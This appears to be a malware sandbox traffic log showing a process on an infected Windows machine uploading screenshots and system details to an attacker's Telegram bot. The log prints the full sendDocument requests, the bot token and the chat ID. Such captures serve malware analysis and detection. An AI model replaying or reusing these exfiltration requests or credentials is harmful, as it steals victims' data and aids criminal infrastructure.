                                              {"ok":true,"result":{"message_id":263,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488750,"document":{"file_name":"user-715575 2024-06-30 12-12-00.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEHZk-KLuCPIWTpx9aep0xtyBaL-JMAAr0TAALx64FSQTEzrh0ihVYBAAdtAAM1BA","file_unique_id":"AQADvRMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEHZk-KLuCPIWTpx9aep0xtyBaL-JMAAr0TAALx64FSQTEzrh0ihVYBAAdtAAM1BA","file_unique_id":"AQADvRMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBB2ZPii7gjyFk6cfWnqdMbcgWi_iTAAK9EwAC8euBUkExM64dIoVWNQQ","file_unique_id":"AgADvRMAAvHrgVI","file_size":66304},"caption":"New SC Recovered!\n\nTime: 06/30/2024 12:01:57\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.749726149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:58 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc9dbc499ffdb5
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              2024-05-23 18:25:58 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 64 62 63 34 39 39 66 66 64 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 64 62 63 34 39 39 66 66 64 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 36 2f 32 30 32 34 20 31 32 3a 35 35 3a 31 39 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc9dbc499ffdb5Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc9dbc499ffdb5Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/06/2024 12:55:19User
                                              2024-05-23 18:25:58 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:58 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:58 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:58 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:58 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:25:58 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 64 62 63 34 39 39 66 66 64 62 35 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc9dbc499ffdb5--
                                              2024-05-23 18:25:58 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:59 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:59 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":264,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488759,"document":{"file_name":"user-715575 2024-07-06 13-05-19.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEIZk-KNhtZTceBVHsBu0re6jWY11UAAr4TAALx64FSDoyU5oAQpzsBAAdtAAM1BA","file_unique_id":"AQADvhMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEIZk-KNhtZTceBVHsBu0re6jWY11UAAr4TAALx64FSDoyU5oAQpzsBAAdtAAM1BA","file_unique_id":"AQADvhMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBCGZPijYbWU3HgVR7AbtK3uo1mNdVAAK-EwAC8euBUg6MlOaAEKc7NQQ","file_unique_id":"AgADvhMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 07/06/2024 12:55:19\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.749727149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:02 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dca0ea8225d491
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:26:02 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:02 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 30 65 61 38 32 32 35 64 34 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 30 65 61 38 32 32 35 64 34 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 31 34 3a 31 33 3a 33 36 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dca0ea8225d491Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dca0ea8225d491Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/10/2024 14:13:36User
                                              2024-05-23 18:26:02 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:02 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:02 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:02 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:02 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:02 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 30 65 61 38 32 32 35 64 34 39 31 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dca0ea8225d491--
                                              2024-05-23 18:26:03 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:03 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":265,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488763,"document":{"file_name":"user-715575 2024-07-10 14-13-44.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEJZk-KO7stILkedeqhlSZDdH7SxF0AAr8TAALx64FSNOsflkA_-64BAAdtAAM1BA","file_unique_id":"AQADvxMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEJZk-KO7stILkedeqhlSZDdH7SxF0AAr8TAALx64FSNOsflkA_-64BAAdtAAM1BA","file_unique_id":"AQADvxMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBCWZPiju7LSC5HnXqoZUmQ3R-0sRdAAK_EwAC8euBUjTrH5ZAP_uuNQQ","file_unique_id":"AgADvxMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 07/10/2024 14:13:36\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.749728149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:07 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dca602c64eb6f3
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:26:07 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:07 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 36 30 32 63 36 34 65 62 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 36 30 32 63 36 34 65 62 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 37 2f 32 30 32 34 20 30 31 3a 34 30 3a 30 30 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dca602c64eb6f3Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dca602c64eb6f3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/17/2024 01:40:00User
                                              2024-05-23 18:26:07 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:07 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
